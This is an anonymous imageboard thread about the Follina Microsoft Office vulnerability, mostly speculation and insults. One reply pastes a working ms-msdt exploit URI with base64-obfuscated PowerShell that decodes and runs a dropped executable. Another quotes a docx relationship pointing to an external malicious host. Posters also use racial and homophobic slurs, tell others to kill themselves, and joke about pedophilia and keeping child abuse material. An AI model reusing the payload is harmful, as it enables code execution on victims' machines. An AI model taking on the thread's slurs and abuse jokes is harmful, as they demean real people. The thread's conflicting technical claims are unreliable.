did whitehats just find an NSA backdoor?

https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e
>a whitehat found some bizzare microsoft official URI protocol that downloads and executes powershell scripts at will
>microsoft refuses to release a security bulletin, instead silently patches it in insider releases
this shit GLOWS

Black Rifle Cuck Company, Conservative Humor Shirt $21.68

UFOs Are A Psyop Shirt $21.68

Black Rifle Cuck Company, Conservative Humor Shirt $21.68

  1. 2 years ago
    Anonymous

    >installing microsoft products
    >ever
    >tfw real life forces you to install microshit on your macbook

    • 2 years ago
      Anonymous

      You can't seriously think appleshit doesnt have three-letter backdoors

      • 2 years ago
        Anonymous

        It doesn't. They got in a big fight with the government over not wanting to unlock that terrorists' iphone. It could have been a 24hrs before something goes off scenario and Apple sill didn't budge. That's why they have my respect.

        • 2 years ago
          Anonymous

          What are publicity stunts?

        • 2 years ago
          Anonymous

          JAJAJAJAJAJAAJAJAJ

          • 2 years ago
            Anonymous

            spic

        • 2 years ago
          Anonymous

          Dumb homosexual. KYS.

        • 2 years ago
          Anonymous

          lel

        • 2 years ago
          Anonymous

          you are moronic

    • 2 years ago
      Anonymous

      I keep windows xp on my MacBook in a little box. I only let him out when I need to talk to hardware with some vendor custom drivers

    • 2 years ago
      Anonymous

      Libreoffice is awful, especially for non-Latin text

  2. 2 years ago
    Anonymous

    thank you for your service glowsirs and glowmadams.

    Bad guys cant install a virus if the good guys infect you first!

  3. 2 years ago
    Anonymous

    >You have 2 free member-only stories left this month. Sign up for Medium and get an extra one
    Kys Black person. Shove your paywalled article up your ass.
    If the only reference is a shitty Medium Gold article this is obviously then this is obviously a nothingburger.

  4. 2 years ago
    Anonymous

    >downloads and executes powershell scripts at will
    WTF??? This is huge.

  5. 2 years ago
    Anonymous

    >downloads and executes powershell scripts at will
    I am pretty sure you can do this without admin rights.

    • 2 years ago
      Anonymous

      The problem is not the user executing scripts, the problem is the document itself automatically downloading and executing scripts crafted by the .docx author.

      • 2 years ago
        Anonymous

        Oh nice. Frick MS.

      • 2 years ago
        Anonymous

        It also works with RTF files

  6. 2 years ago
    Anonymous

    Likely. I mean, we know they do this already. They'll just say it was a bug and move on.

  7. 2 years ago
    Anonymous

    I can't even view the article in the OP. It shows me the first sentence then tells me to pay up. What a shitty fricking website.

  8. 2 years ago
    Anonymous

    Frick I hate MS
    I'm forced to use their glowware
    Stallman was right again

    • 2 years ago
      Anonymous

      This is why you keep a dedicated work system and work happens on it. Apart from that frick that shit shut it down and use proper software.

  9. 2 years ago
    Anonymous

    >install GlowieOS
    >it glows

    What did you think was going to happen?

  10. 2 years ago
    Anonymous

    Help free yourself my friend

  11. 2 years ago
    Anonymous

    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'*~~)i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"";

    • 2 years ago
      Anonymous

      This is linkek from a relationship in the docx

      https://docs.fileformat.com/word-processing/docx/#relationships---_relsrels

      • 2 years ago
        Anonymous

        The resource linked is described as oleObject:

        Archive: 05-2022-0438.doc
        *
        *
        *
        * word/_rels/document.xml.rels

        <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
        [..]
        <Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="https://www.xmlformats.comMALWARESITE/office/word/2022/worddprocessingDrawing/RDF842l.html!" TargetMode="External"/>

        This file is a HTML file with a script (pic related)

    • 2 years ago
      Anonymous

      That is some beautiful looking code brother

  12. 2 years ago
    Anonymous

    >it's already been fixed
    >requires macros to be enabled
    >no eop
    Yep, it's yet another IQfy nothingburger.
    Why does it have to be every time.

    • 2 years ago
      Anonymous

      In the article they say it works with macros disabled. Good thing it is fixed now

      • 2 years ago
        Anonymous

        >implying
        They just shifted the protocol semantics around and kept the backdoor intact

      • 2 years ago
        Anonymous

        >microsoft refuses to release a security bulletin, instead silently patches it in insider releases
        they haven't patched it

        >Good thing it is fixed now
        It's not,
        RTF files still have the vulnerability.

    • 2 years ago
      Anonymous

      >requires macros to be enabled
      you illiterate gorilla Black person

    • 2 years ago
      Anonymous

      >https://archive.is/BahYU
      You're a fricking nothingburger

    • 2 years ago
      Anonymous

      Microsoft employees are not allowed to post on IQfy.

  13. 2 years ago
    Anonymous

    Don't care still using Windows. I have nothing to hide from the government because I'm not a sick pedophile.

    • 2 years ago
      Anonymous

      You're just a sedentary sea creature waving in the currents.

      • 2 years ago
        Anonymous

        How do I become a cute little hermit crab?

    • 2 years ago
      Anonymous

      I am a pedophile but I still use Windows because it works

      • 2 years ago
        Anonymous
    • 2 years ago
      Anonymous

      Why are you so pedophobic? Go for a walk.

    • 2 years ago
      Anonymous

      you dont have private anything
      nudes, unfinished novels, code, pics of your kids/whatever, social security numbers, etc.
      are you one of those famous incels

  14. 2 years ago
    Anonymous

    Shit likes this makes me glad I am a linux autist.

  15. 2 years ago
    Anonymous

    WINgayS BTFO

  16. 2 years ago
    Anonymous

    bump for visibility

  17. 2 years ago
    Anonymous

    Does it also work if you don't enable editing?
    It should be a static read-only document that doesn't do anything, right?

    • 2 years ago
      Anonymous

      considering it even works from the explorer preview before you open the document... i don't think that will help you

      • 2 years ago
        Anonymous

        Frick

        • 2 years ago
          Anonymous

          time to firewall your office suite

    • 2 years ago
      Anonymous

      Yes, it works inside of protected view.

  18. 2 years ago
    Anonymous

    >whitehats
    This is blatant racism and as an ally of Black folk worldwide I must condemn this horrifying mis-usage of the word

    • 2 years ago
      Anonymous

      what should they be called then?

      • 2 years ago
        Anonymous

        Goodest bois

        • 2 years ago
          Anonymous

          they aren't good THOUGH

  19. 2 years ago
    Anonymous

    Should I just become a paranoid schizo at this point?

    • 2 years ago
      Anonymous

      yes

  20. 2 years ago
    Anonymous

    >not keeping your CP in the win98 machine

    Amateurs

  21. 2 years ago
    Anonymous

    Good combination of 'safe' components to do undesirable things. Office doesn't secure the use of ms-msdt scheme because "Hey, it's just starting the built-in Windows troubleshooter tool". Then MSDT allows you to specify things that aren't actually troubleshooting modules because 'why would anyone call us one something that isn't a valid troubleshooting module'.

  22. 2 years ago
    Anonymous

    >NSA
    Microshit
    ftfy

  23. 2 years ago
    Anonymous

    dostoddlers btfo

  24. 2 years ago
    Anonymous

    no microsoft is trying to be very quiet because they force install office since windows 10, every single computer out there can be totally fricked unless you went through the trouble to uninstall all of the bloat

  25. 2 years ago
    Anonymous

    >windows is absolute trash
    nothing new here. people never used windows because they liked it or it worked.

  26. 2 years ago
    Anonymous

    >Letting word connect to the internet
    For what purpose?

Your email address will not be published. Required fields are marked *